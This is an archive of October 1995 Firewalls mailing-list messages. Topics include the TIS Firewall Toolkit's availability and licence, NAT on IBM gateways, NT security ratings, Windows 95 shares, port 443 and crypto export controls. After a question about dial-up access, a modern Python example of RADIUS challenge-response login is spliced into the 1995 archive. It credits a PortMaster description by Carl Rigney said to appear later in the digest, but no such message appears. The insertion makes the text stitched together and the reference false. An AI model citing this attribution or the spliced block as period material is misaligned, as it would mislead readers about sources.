Tucker bt@vnet.ibm.com IBM Southern Area Open Systems Center 1600 Riveredge Parkway Atlanta GA 30328 Subject: 'IBM NAT box' Take it from me, the IBM Internet Connection (nee NetSP) Secure Network Gateway product (I always call it a firewall) DOES NOT do address translation. Address hiding, yes. The ability to use private addressing by shutting down all packets through the packet filter and just using the proxies and SOCKS gateway, yes. Address translation, no. I don't know of a box from IBM to do address translation - but I'd like to have one, so I'm searching to ensure that my info is correct. thank you, Brian 404-644-5231 (Tie 237)(Fax 644-5284) From firewalls-owner Wed Oct 11 12:41:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07675 for firewalls-outgoing; Wed, 11 Oct 1995 12:26:28 -0700 Received: from dax.sai.com (dax.sai.com [198.137.245.66]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07668 for ; Wed, 11 Oct 1995 12:26:25 -0700 Received: from dax.sai.com by dax.sai.com with smtp (Smail3.1.29.1 #3) id m0t36mD-003pNJC; Wed, 11 Oct 95 15:25 EDT Date: Wed, 11 Oct 1995 15:25:17 -0400 (EDT) From: Darryl Wagoner To: Robert Owen Thomas cc: Firewalls@GreatCircle.COM Subject: Re: TIS FWTK? In-Reply-To: <9510111325.ZM16011@pamd.cig.mot.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 11 Oct 1995, Robert Owen Thomas wrote: > does anyone know where i can obtain a copy of the TIS Firewall Toolkit? > as i understand it, this is freeware. i tried ftp.near.net, but they > have the TIS stuff under lock and key. This is a trick question right? ftp.tis.com:/pub/firewalls/toolkit -- Darryl Wagoner darryl@sai.com http://www.sai.com/ Office: 603.672.0736 Fax: 603-672-4846 Web Pages for hire. 
Check out NH & MA Movies http://www.sai.com/movies From firewalls-owner Wed Oct 11 12:43:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07985 for firewalls-outgoing; Wed, 11 Oct 1995 12:39:45 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07974 for ; Wed, 11 Oct 1995 12:39:33 -0700 Date: Wed, 11 Oct 95 15:35 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: Oops! To: firewalls@GREATCIRCLE.COM Message-ID: <951011193534.990214@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Never mind that last posting about the errant "From:" header -- I see that it was a piece of plain-jane text embedded in a message with an earlier "From:" header. So much for using line editors and not peeking ten lines earlier. "Look 'ere ye leap." -- Heywood From firewalls-owner Wed Oct 11 13:00:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07880 for firewalls-outgoing; Wed, 11 Oct 1995 12:33:14 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07873 for ; Wed, 11 Oct 1995 12:33:08 -0700 Date: Wed, 11 Oct 95 15:27 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: B2 rated WIndows NT? To: firewalls@GREATCIRCLE.COM Message-ID: <951011192756.209813@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Funny how a message with a "From: Wilner" header contains comments written by one Mr. Greg King. I certainly didn't put the comments there. Does Microsoft typically edit people's transactions before they get posted to this forum, or did the Majordomo scripts somehow screw up? 
From firewalls-owner Wed Oct 11 13:13:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08727 for firewalls-outgoing; Wed, 11 Oct 1995 13:08:27 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA08712 for ; Wed, 11 Oct 1995 13:08:23 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id QAA00756; Wed, 11 Oct 1995 16:06:27 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id QAA00309; Wed, 11 Oct 1995 16:06:24 -0400 (EDT) Date: Wed, 11 Oct 1995 16:06:24 -0400 (EDT) Message-Id: <199510112006.QAA00309@SPARKY.CF.CS.YALE.EDU> To: Firewalls@GreatCircle.COM, rthomas@pamd.cig.mot.com Subject: Re: TIS FWTK? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com wrote: >does anyone know where i can obtain a copy of the TIS Firewall Toolkit? >as i understand it, this is freeware. i tried ftp.near.net, but they >have the TIS stuff under lock and key. > >any other suggested ftp/web sites? ftp://ftp.tis.com/pub/firewalls/toolkit/ - Morrow From firewalls-owner Wed Oct 11 13:16:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08698 for firewalls-outgoing; Wed, 11 Oct 1995 13:06:35 -0700 Received: from little-miami.iac.net (little-miami.iac.net [198.180.60.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA08691 for ; Wed, 11 Oct 1995 13:06:31 -0700 From: cjolley@iac.net Received: from 199.6.47.253 by little-miami.iac.net with SMTP id QAA25785; Wed, 11 Oct 1995 16:04:34 -0400 Message-Id: <199510112004.QAA25785@little-miami.iac.net> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Date: Wed, 11 Oct 95 16:02:30 -0500 Subject: Re: TIS FWTK? 
To: rthomas@pamd.cig.mot.com (Robert Owen Thomas), Firewalls@GreatCircle.COM In-Reply-To: <9510111325.ZM16011@pamd.cig.mot.com> X-Mailer: SPRY Mail Version: 04.00.06.17 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You should try anonymous ftp to ftp.tis.com. The FWTK is copyright Trusted Information Systems however they will license the software at no cost. On Wed, 11 Oct 1995, rthomas@pamd.cig.mot.com (Robert Owen Thomas) wrote: >does anyone know where i can obtain a copy of the TIS Firewall Toolkit? >as i understand it, this is freeware. i tried ftp.near.net, but they >have the TIS stuff under lock and key. > >any other suggested ftp/web sites? > >thanx in advance. > >regards, >--robert >-- > >o robert owen thomas: unix consultant. cymro ydw i. user scratching post. o >o e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com o >o vox: 708.435.7076 fax: 708.435.7360 o >o "When I die, I want to go sleeping like my grandfather... o >o Not screaming like the passengers in his car." 
o > > **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Wed Oct 11 13:18:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA08208 for firewalls-outgoing; Wed, 11 Oct 1995 12:45:47 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA08199 for ; Wed, 11 Oct 1995 12:45:38 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id OAA20972 for ; Wed, 11 Oct 1995 14:43:35 -0500 Received: from segfs001.rollingmdws.pamd.cig.mot.com (segfs001.rollingmdws.pamd.cig.mot.com [160.4.63.51]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id OAA21686 for ; Wed, 11 Oct 1995 14:43:34 -0500 Received: from segws002.rollingmdws.pamd.cig.mot.com by segfs001.rollingmdws.pamd.cig.mot.com with smtp (Smail3.1.28.1 #10) id m0t373u-0011WBC; Wed, 11 Oct 95 14:43 CDT Received: by segws002.rollingmdws.pamd.cig.mot.com (Smail3.1.28.1 #10) id m0t370i-000VWyC; Wed, 11 Oct 95 14:40 CDT From: rthomas@pamd.cig.mot.com (Robert Owen Thomas) Message-Id: <9510111440.ZM16183@pamd.cig.mot.com> Date: Wed, 11 Oct 1995 14:40:15 -0500 In-Reply-To: Darryl Wagoner "Re: TIS FWTK?" (Oct 11, 2:25pm) References: X-Face: '+o0q01K;YU[Po[u16e?snj8;Ph$olcxk+[`d9&@_u}|*>qi52AcH"6z36pohM2<-EvKgoH[/FTF`GG)Csl`+9(6V/3W/BC9Pu3l0\2y$wGP@bj!Yn~f=_#.x.dYzEWFDe_MLBUIK\n[nkM_sq}/OjBILuOP$:F1#;YjjN3?PG8CJTwD"p/zT~^V_MqO\e Subject: Re: TIS FWTK? Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk what i neglected to mention was that i was unable to access ftp.tis.com, for some unknown reason. i did find the TIS toolkit in the COAST archives, however. -- o robert owen thomas: unix consultant. cymro ydw i. user scratching post. 
o o e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com o o vox: 708.435.7076 fax: 708.435.7360 o o "When I die, I want to go sleeping like my grandfather... o o Not screaming like the passengers in his car." o From firewalls-owner Wed Oct 11 13:52:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09225 for firewalls-outgoing; Wed, 11 Oct 1995 13:29:39 -0700 Received: from ftp.com (ftp.com [128.127.2.122]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA09218 for ; Wed, 11 Oct 1995 13:29:36 -0700 Received: from ftp.com by ftp.com ; Wed, 11 Oct 1995 16:27:41 -0400 Received: from mailserv-F.ftp.com by ftp.com ; Wed, 11 Oct 1995 16:27:41 -0400 Received: from shishir.nepal by mailserv-F.ftp.com (5.0/SMI-SVR4) id AA14946; Wed, 11 Oct 95 16:24:37 EDT Date: Wed, 11 Oct 95 16:24:37 EDT Message-Id: <9510112024.AA14946@mailserv-F.ftp.com> To: rthomas@pamd.cig.mot.com Subject: Re: TIS FWTK? From: shishir@ftp.com (shishir belbase) Reply-To: shishir@ftp.com Cc: Firewalls@GreatCircle.COM Repository: mailserv-F.ftp.com, [message accepted at Wed Oct 11 16:24:28 1995] Originating-Client: nepal Content-Length: 334 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > does anyone know where i can obtain a copy of the TIS Firewall Toolkit? > as i understand it, this is freeware. i tried ftp.near.net, but they > have the TIS stuff under lock and key. > > any other suggested ftp/web sites? > ftp.tis.com under /pub/..... ftp.nec.com under /pub/security/... 
( SOCKS stuff ) shishir From firewalls-owner Wed Oct 11 14:18:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10159 for firewalls-outgoing; Wed, 11 Oct 1995 14:00:36 -0700 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA10151 for ; Wed, 11 Oct 1995 14:00:32 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa08223; 11 Oct 95 16:46 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma013807; Wed, 11 Oct 95 16:29:25 -0400 Received: by tis.com (4.1/SUN-5.64) id AA20742; Wed, 11 Oct 95 16:46:03 EDT Date: Wed, 11 Oct 95 16:46:03 EDT From: Frederick M Avolio Message-Id: <9510112046.AA20742@tis.com> To: Firewalls@greatcircle.com, rthomas@pamd.cig.mot.com Subject: Re: TIS FWTK? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk try ftp.tis.com. try www.tis.com. It is freely available but licensed s/w and intended for experts to install and not for profit. read the LICENSE, README, and DISCLAIMER. Fred From firewalls-owner Wed Oct 11 14:33:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA11194 for firewalls-outgoing; Wed, 11 Oct 1995 14:27:05 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA11185 for ; Wed, 11 Oct 1995 14:27:00 -0700 Date: Wed, 11 Oct 1995 17:25:08 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951011172508.2105da1d@hobbes.orl.mmc.com> Subject: Windoze NT C2 ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kim rites: >I must correct you here. Both of the above Compaqs come with a network >interface card built in, so no configuration is possible without a card. >Thus I would assume the C2 certification covers that. Marketeers thrive on assumptions. 
To quote: "These are designated as file servers but were evaluated only for use as stand-alone workstations with no networking capability." Is that explicit enough ? Warmly, Padgett From firewalls-owner Wed Oct 11 14:43:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10899 for firewalls-outgoing; Wed, 11 Oct 1995 14:20:08 -0700 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA10892 for ; Wed, 11 Oct 1995 14:20:04 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa08570; 11 Oct 95 17:12 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma014142; Wed, 11 Oct 95 16:55:30 -0400 Received: by tis.com (4.1/SUN-5.64) id AA22322; Wed, 11 Oct 95 17:12:20 EDT Date: Wed, 11 Oct 95 17:12:20 EDT From: Frederick M Avolio Message-Id: <9510112112.AA22322@tis.com> To: darryl@sai.com, rthomas@pamd.cig.mot.com Subject: Re: TIS FWTK? Cc: Firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The COAST archives should not have this nor should any other site. We cannot enforce it but we do request that people NOT copy the FWTK to other sites. Too many other sites copy once or twice and then never again. Or they copy only the source kit and not the doc kit. Or they leave off the LICENSE or README or DISCLAIMER. Our request is that people NOT put the FWTK on their FTP site nor on CDs for distribution. Over 8000 sites have retrieved the FWTK code so I'd expect that ftp.tis.com is fairly accessible and perhaps you had DNS problems when you tried. 
Fred From firewalls-owner Wed Oct 11 14:44:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10869 for firewalls-outgoing; Wed, 11 Oct 1995 14:19:15 -0700 Received: from fshops.sfsu.edu (fshops.sfsu.edu [130.212.45.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA10861 for ; Wed, 11 Oct 1995 14:19:11 -0700 Received: from sansom@fshops.sfsu.edu by fshops.sfsu.edu (5.64/Tenon-1.35.01) id AA05598; Wed, 11 Oct 95 14:22:56 -0700 (PDT) Date: Wed, 11 Oct 95 14:22:56 -0700 (PDT) X-Sender: sansom@servo.fshops.sfsu.edu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: sansom@fshops.sfsu.edu (Rob Sansom) Subject: Windows 95 exporting Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a friend that recently set up some Windows 95 PC's on his network, and some of the people that use them say that they can access their 'Published' directories from the Internet. I don't have access to any Windows 95 machines (the only PC that is running it doesn't work), and I am supposed to help him configure his router as a packet filter. I imagine the 'Published' feature is something similar to Unix NFS, and uses a TCP port number for client access (?). If this is so, does anyone out there in the world of PC's know what this port number is so I can filter it with a router? Thanks in advance, Rob Sansom Franciscan Shops Inc. 
From firewalls-owner Wed Oct 11 15:01:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA12091 for firewalls-outgoing; Wed, 11 Oct 1995 14:54:05 -0700 Received: from styx.wsc.com (styx.wsc.com [198.4.124.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA12084 for ; Wed, 11 Oct 1995 14:54:01 -0700 Received: from hera.wscis.wsc.com (hera.wscis.wsc.com [198.4.125.3]) by styx.wsc.com (8.6.8/8.6.6) with ESMTP id RAA01974 for ; Wed, 11 Oct 1995 17:52:07 -0400 Received: from hermes.wscis.wsc.com (hermes [198.4.125.24]) by hera.wscis.wsc.com (8.6.8/8.6.6) with SMTP id RAA07176 for ; Wed, 11 Oct 1995 17:52:07 -0400 From: Andre Soto Message-Id: <199510112152.RAA07176@hera.wscis.wsc.com> Received: by hermes.wscis.wsc.com (NX5.67d/NX3.0X) id AA02861; Wed, 11 Oct 95 17:52:06 -0400 Date: Wed, 11 Oct 95 17:52:06 -0400 Received: by NeXT.Mailer (1.100) Received: by NeXT Mailer (1.100) To: firewalls@GreatCircle.COM Subject: wu-ftp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have wu-ftp pretty much set up. I am experiencing one problem though. When I ftp into my site I cannot see a listing of my filenames upon executing ls or dir. I have played with the permissions and the ownership. I even went as far as to set everything to 777. What have I done wrong? Any and all assistance is greatly appreciated. Thank you, Andre L. 
Soto asoto@wsc.com From firewalls-owner Wed Oct 11 15:02:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA12192 for firewalls-outgoing; Wed, 11 Oct 1995 14:56:15 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA12182 for ; Wed, 11 Oct 1995 14:56:08 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id QAA21878 for ; Wed, 11 Oct 1995 16:54:15 -0500 Received: from segfs001.rollingmdws.pamd.cig.mot.com (segfs001.rollingmdws.pamd.cig.mot.com [160.4.63.51]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id QAA00852 for ; Wed, 11 Oct 1995 16:54:14 -0500 Received: from segws002.rollingmdws.pamd.cig.mot.com by segfs001.rollingmdws.pamd.cig.mot.com with smtp (Smail3.1.28.1 #10) id m0t396L-0011V8C; Wed, 11 Oct 95 16:54 CDT Received: by segws002.rollingmdws.pamd.cig.mot.com (Smail3.1.28.1 #10) id m0t3938-000VWyC; Wed, 11 Oct 95 16:50 CDT From: rthomas@pamd.cig.mot.com (Robert Owen Thomas) Message-Id: <9510111650.ZM16443@pamd.cig.mot.com> Date: Wed, 11 Oct 1995 16:50:54 -0500 In-Reply-To: Frederick M Avolio "Re: TIS FWTK?" (Oct 11, 4:12pm) References: <9510112112.AA22322@tis.com> X-Face: '+o0q01K;YU[Po[u16e?snj8;Ph$olcxk+[`d9&@_u}|*>qi52AcH"6z36pohM2<-EvKgoH[/FTF`GG)Csl`+9(6V/3W/BC9Pu3l0\2y$wGP@bj!Yn~f=_#.x.dYzEWFDe_MLBUIK\n[nkM_sq}/OjBILuOP$:F1#;YjjN3?PG8CJTwD"p/zT~^V_MqO\e Subject: Re: TIS FWTK? Cc: darryl@sai.com, Firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hello, Fred-- thanx for the info, Fred. i will obtain an official distribution from your ftp site. no worries. certainly i am not stating that there is anything wrong with your site. as i said in my e-mail to you earlier, this is most likely a problem at my ISP site. this would not be the first time such demons arose. 
thanx, again. regards, --robert -- o robert owen thomas: unix consultant. cymro ydw i. user scratching post. o o e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com o o vox: 708.435.7076 fax: 708.435.7360 o o "When I die, I want to go sleeping like my grandfather... o o Not screaming like the passengers in his car." o From firewalls-owner Wed Oct 11 15:57:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA13242 for firewalls-outgoing; Wed, 11 Oct 1995 15:27:43 -0700 Received: from herne.newsedge.com (herne.newsedge.com [192.206.85.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA13235 for ; Wed, 11 Oct 1995 15:27:39 -0700 Date: Wed, 11 Oct 95 18:25:41 EST Message-Id: <9510111825.AA13540@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: Port question X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know what port 443 is used for? Check out: http://necxdirect.necx.com You're passed to port 8002 and then 443. Does anyone see any problems with opening up port 443 access to the net? Thanks for any help! 
From firewalls-owner Wed Oct 11 16:01:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA13390 for firewalls-outgoing; Wed, 11 Oct 1995 15:32:35 -0700 Received: from cs.umass.edu (freya.cs.umass.edu [128.119.40.195]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA13382 for ; Wed, 11 Oct 1995 15:32:31 -0700 Received: from thor.cs.umass.edu by cs.umass.edu (5.65/Ultrix3.0-C) id AA20008; Wed, 11 Oct 1995 18:30:23 -0400 Received: (from lmccarth@localhost) by thor.cs.umass.edu (8.6.12/8.6.9) id SAA16369; Wed, 11 Oct 1995 18:30:23 -0400 Message-Id: <199510112230.SAA16369@thor.cs.umass.edu> Subject: Re: International Encryption Protocols To: Firewalls@GreatCircle.COM Date: Wed, 11 Oct 1995 18:30:23 -0400 (EDT) Reply-To: firewalls@GreatCircle.COM (Firewalls Mailing List) In-Reply-To: <199510112017.NAA08945@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Oct 11, 95 01:17:42 pm From: futplex@pseudonym.com (Futplex) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1986 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ted Doty writes: > Certainly the signatory countries to the CoCom treaty all enforce similar > export controls to those enforced by the USA. Therefore, do not go looking > to purchase cryptography in the UK for use outside the UK. I think this is misleading. CoCom, the Coordinating Committee for Multilateral Export Controls, amounted to a non-proliferation pact to prevent the spread of supercomputers and other hot potatoes beyond the club of countries to untrusted (non-CoCom) countries. As far as I can tell it did not erect export barriers _between member countries_, except perhaps some ordinary red tape. 
Before it officially dissolved in early 1994, CoCom included, among others, all of the G7 plus a healthy chunk of Western Europe: Australia, Belgium, Canada, Denmark, France, Germany, Greece, Italy, Japan, Luxembourg, the Netherlands, Norway, Portugal, Spain, Turkey, the U.K., and the U.S. According to http://www.chemie.fu-berlin.de/adressen/org-fact.html, Austria, Finland, Ireland, South Korea, New Zealand, Singapore, Sweden, and Switzerland were voluntarily cooperating with the export restrictions. As far as CoCom was concerned, you could generally sell crypto from Britain to most of the net. This is a far cry from the position of the U.S. ITAR, which prohibits the export of strong confidentiality-protecting crypto to the U.K., for example. Most of the other CoCom signatories do _not_ enforce export controls similar to the U.S. ones. [...] > Note: the treaty has expired, but the signatory countries seem to still be > willing to follow it. Nobody really wants to see strong crypto widely > deployed. Make that "No government really wants...." and I'll agree with you. BTW, ftp://ftp.eff.org/pub/CAF/law/software-export-law contains an interesting, detailed memo dated 95/03/06, from a California law firm, giving an "Update on Current Status of U.S. Export Administration Regulations on Software Exports". 
-Futplex From firewalls-owner Wed Oct 11 16:30:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA15159 for firewalls-outgoing; Wed, 11 Oct 1995 16:17:39 -0700 Received: from VNET.IBM.COM (vnet.ibm.com [199.171.26.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA15148 for ; Wed, 11 Oct 1995 16:17:35 -0700 From: PESTONI@BUEVM1.VNET.IBM.COM Message-Id: <199510112317.QAA15148@miles.greatcircle.com> Received: from BUEVM1 by VNET.IBM.COM (IBM VM SMTP V2R3) with BSMTP id 5546; Wed, 11 Oct 95 19:15:38 EDT Date: Wed, 11 Oct 95 20:11:07 EDT To: firewalls@greatcircle.com Subject: Dial-up access Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear security gurus, I have a couple of questions about support for dial-up access. Can anyone point me to information about SLIP and PPP implementing TACACS/+ or RADIUS (unfortunately, I need to support DOS too)? How about concentrators for asynchronous lines (aka terminal server, aka access server) that include filtering (a la Cisco's 2511)? Regards, Florian. 
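An added example, not code from any poster in this digest, of the two-round RADIUS challenge-response login that Florian is asking about and that Carl Rigney's PortMaster description later in this digest lays out (Access-Request, Access-Challenge with a string shown to the user, second Access-Request carrying the response). The User-Password hiding is RFC 2865's; the user name, shared secret, token key and the HMAC-based response scheme are constructed for illustration, and the terminal server's 16-character response limit is modelled so its effect on a longer (PGP-style) response is visible.

```python
import hashlib
import hmac
import os

# RADIUS packet codes and attribute types from RFC 2865.
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT, ACCESS_CHALLENGE = 1, 2, 3, 11
USER_NAME, USER_PASSWORD, REPLY_MESSAGE, STATE = 1, 2, 18, 24

# Most characters the terminal server (NAS) accepts as a challenge response,
# as described for the PortMaster in this digest.
NAS_RESPONSE_LIMIT = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 User-Password hiding, as the NAS applies it.

    The password is NUL-padded to a multiple of 16 bytes; each block is XORed
    with MD5(shared secret + previous ciphertext block), the first block using
    the 16-byte Request Authenticator in place of a previous block.
    """
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        block = _xor(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out, prev = out + block, block
    return out


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of hide_password, as the RADIUS server applies it (padding stripped)."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        out += _xor(hidden[i:i + 16], hashlib.md5(secret + prev).digest())
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def expected_response(user_key: bytes, challenge: str, length: int) -> str:
    """Constructed response scheme for this example (not a standard): the user's
    token returns the first `length` hex digits of HMAC-SHA256(key, challenge)."""
    digest = hmac.new(user_key, challenge.encode(), hashlib.sha256).hexdigest()
    return digest[:length]


class RadiusChallengeServer:
    """Server side of the exchange: Access-Request -> Access-Challenge, then a
    second Access-Request (State echoed back) -> Access-Accept or Access-Reject."""

    def __init__(self, secret: bytes, user_keys: dict, response_length: int = 16):
        self.secret = secret
        self.user_keys = user_keys        # user name -> key shared with the user's token
        self.response_length = response_length
        self.pending = {}                 # State value -> (user, challenge), single use

    def handle(self, code: int, attrs: dict, authenticator: bytes):
        user = attrs.get(USER_NAME)
        if code != ACCESS_REQUEST or user not in self.user_keys:
            return ACCESS_REJECT, {}
        typed = reveal_password(attrs[USER_PASSWORD], self.secret, authenticator)
        state = attrs.get(STATE)
        if state is None:
            # Round one: the password may be a dummy; issue a fresh random challenge.
            challenge, state = os.urandom(4).hex(), os.urandom(8)
            self.pending[state] = (user, challenge)
            return ACCESS_CHALLENGE, {REPLY_MESSAGE: "Challenge: " + challenge, STATE: state}
        # Round two: State must name an outstanding challenge for this user, and is
        # consumed on first use so a captured response cannot simply be replayed.
        pending = self.pending.pop(state, None)
        if pending is None or pending[0] != user:
            return ACCESS_REJECT, {}
        want = expected_response(self.user_keys[user], pending[1], self.response_length)
        if hmac.compare_digest(typed, want.encode()):
            return ACCESS_ACCEPT, {REPLY_MESSAGE: "Welcome"}
        return ACCESS_REJECT, {}


def nas_request(server, secret: bytes, user: str, typed: str, state=None):
    """What the NAS does with the characters the user typed: keep at most
    NAS_RESPONSE_LIMIT of them, hide them as User-Password, send the request."""
    authenticator = os.urandom(16)
    attrs = {USER_NAME: user,
             USER_PASSWORD: hide_password(typed[:NAS_RESPONSE_LIMIT].encode(), secret, authenticator)}
    if state is not None:
        attrs[STATE] = state
    return server.handle(ACCESS_REQUEST, attrs, authenticator)


def dial_in(server, secret: bytes, user: str, responder):
    """Run one complete login; responder(challenge) models the user's token or software."""
    code, reply = nas_request(server, secret, user, "dummy")
    if code != ACCESS_CHALLENGE:
        return code
    challenge = reply[REPLY_MESSAGE].split(": ", 1)[1]
    code, _ = nas_request(server, secret, user, responder(challenge), state=reply[STATE])
    return code
```

With `response_length=40` on the server, even the legitimate user is rejected, because the NAS truncates the typed response to 16 characters before hiding it.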
From firewalls-owner Wed Oct 11 16:43:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA15094 for firewalls-outgoing; Wed, 11 Oct 1995 16:15:03 -0700 Received: from safety.worldcom.com (safety.worldcom.com [198.64.193.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA15084 for ; Wed, 11 Oct 1995 16:14:56 -0700 Received: (from smtp@localhost) by safety.worldcom.com (8.7.1/8.6.9) id SAA16804 for ; Wed, 11 Oct 1995 18:05:30 -0500 (CDT) Received: from samba.worldcom.com(198.64.193.32) by safety.worldcom.com via smap (V1.3) id sma016801; Wed Oct 11 18:05:25 1995 Received: (smtp@localhost) by samba.worldcom.com (8.6.11/8.6.9) id SAA14875 for ; Wed, 11 Oct 1995 18:05:24 -0500 Received: from samba.worldcom.com(198.64.193.32) by samba.worldcom.com via smap (V1.3) id sma014873; Wed Oct 11 18:05:21 1995 Date: Wed, 11 Oct 1995 18:05:20 -0500 (CDT) From: Robert Dana Reply-To: Robert Dana Subject: NT FTP weirdness To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 